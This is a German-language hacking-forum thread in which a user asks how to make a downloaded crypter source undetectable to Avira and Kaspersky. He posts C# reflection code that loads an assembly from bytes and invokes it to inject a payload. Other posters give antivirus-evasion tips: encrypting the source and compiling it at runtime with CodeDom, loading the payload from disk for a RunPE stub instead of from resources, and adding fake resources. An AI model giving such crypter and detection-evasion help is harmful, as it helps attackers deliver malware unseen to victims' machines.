14 Antworten in diesem Thema

[Take1T]

Hey, ich habe mir letztens nen Crypter Source heruntergeladen, verstehe ihn auch relativ gut. So, ich habe folgendes herausgefunden. Die beiden Detections von Avira und Kaspersky, kommen von diesen Lines:

 

Um Genau zu sein liegt es bei ".Invoke" und ".GetMethods()". Wie genau kann ich die beheben? Bin realtiv neu bei Cryptern.

Type asjkdshadjhaskjdgasgdjasd = Assembly.Load(sjdfhsdgfsgfsgdfsgfsgfsjdf).GetType(jajhajjadjadjdasjd()[0]);
                MethodInfo ahsjdashdhjkuadsjh = null;
                foreach (MethodInfo m in asjkdshadjhaskjdgasgdjasd.GetMethods())
                {
                    if (m.Name == jajhajjadjadjdasjd()[1])
                    {
                        ahsjdashdhjkuadsjh = m;
                    }
                }
                bool jwahusjhsehufsehjfsehdh = (bool)ahsjdashdhjkuadsjh.Invoke(null, new object[] { Assembly.GetExecutingAssembly().Location, "", hasgdashgdahsgdasdhasjd, false });

[Cube]

Das sieht mir so aus, als würdest du mit "schlichtem" invoke ein .net file callen.

Sprich ein Crypter der eben nur .Net Assemblies managen/crypten kann?

Ich bezweifle, dass du den Source hier wirklich verstehst was hier eig passiert, sonst würde deine Frage nicht wie im ST steht lauten.

WIe dem auch sei.

 

Naja das sind DIE 2 ZEILEN!

Das is so als würdest du uns hier posten:

DIe RunPE ist detected, wie krieg ich dir FUD?

 

Naja dann bekommst du die Antwort: Komplett neu herangehen/umgestalten.

 

Klar könnte man das ganze irgendwie codieren/verschlüsseln, also den Source, und dann zur Laufzeit via Codedom kompilieren lassen.

Aber naja wirklich gut ist was anderes.

 

Hast du vlt mal den ganzen Source?

Oder vlt ne absolute clean version ohne Random Stringnames?

 

Grüße

Cube

[SAR]

Bin einmal schon rüber zum Säubern.

 

Type Type1 = Assembly.Load(ByteArray).GetType(StringName()[0]);
MethodInfo MethodInfo1 = null;
foreach (MethodInfo m in Type1.GetMethods())
{
    if (m.Name == StringName()[1])
    {
         MethodInfo1 = m;
    }
}
bool erfolgreich = (bool)MethodInfo1.Invoke(null, new object[] { Assembly.GetExecutingAssembly().Location, "", hasgdashgdahsgdasdhasjd, false });

 

 

Mfg.
SAR

[n1nja]

Die Detektion bekommst du weg, wenn du Code nicht direkt in der Stube schreibst, sondern über ne Datei ausführen lässt.

[Take1T]

               MethodInfo myCrypt = Assembly.Load(InjRes).GetType("Resource.reflect").GetMethod("Run");
                bool inj = (bool)myCrypt .Invoke(null, new object[] { Assembly.GetExecutingAssembly().Location, "", PayloadRes, false });

Das ist der Originale Code

Bearbeitet von Take1T, 11 May 2015 - 16:48 Uhr.

[n1nja]

Zeig uns mal den kompletten Code.
Falls du ne RunPE benutzt. Auch diesen.
Kann auch möglich sein, das die Dedected ist.

[Take1T]

Danke schonmal fuer die Hilfe. Die RunPE wird nicht dectected.

...

Bearbeitet von Take1T, 12 May 2015 - 15:13 Uhr.

[n1nja]

Dann wird wohl deine StorageMethod dedected sein so wie es aussieht.
Sieht aus wie public Crypt Stuff:)

Versuch die Datei nicht in den Rrsourcen zu schreiben.
Teste es mal mit deiner Festplatte.
Also öffne die Datei auf der Platte und schreib nix in den Resourcen.

[Take1T]

Na klar ist das nen "relativ" Public Crypter, sonst haette ich denn Source nicht gepostet

Aber wie mache ich das denn genau was du da gesagt hast? 

[n1nja]

Die lädst die Bytes nicht von den Resourcen sondern von der Platte.
Das sollte man wissen wie es geht:)

[Take1T]

Koenntest du mir vllt. ein Code Example geben?

[SAR]

Please Login HERE or Register HERE to see this link!

 

 

Mfg.

SAR

[n1nja]

Falls du das hinbekommen hast.
Lass auch mal die Assemblys weg, könnte auch daran liegen.

Was du noch zusätzlich machen könntest.
Fake-Resourcen hinzufügen. Glaube mich erinnern zu können, das es auch etwas hilft. Wie es jetzt aussieht in der heutigen Zeit, weiß ich nicht.
Lange nix in der Richtung gemacht:)

[Take1T]

@SAR Also soll ich die Resource dann so compilen und als ne Standalone exe auf denn Rechner downloaden und dann die Bytes per File.ReadAllBytes auslesen?

[n1nja]

Nein deine Payload. Also die Datei die du Crypten willst. Auf der Platte einfach ausführen mit der RunPE. Einfach statt den Resourcen. Die Bytes so laden.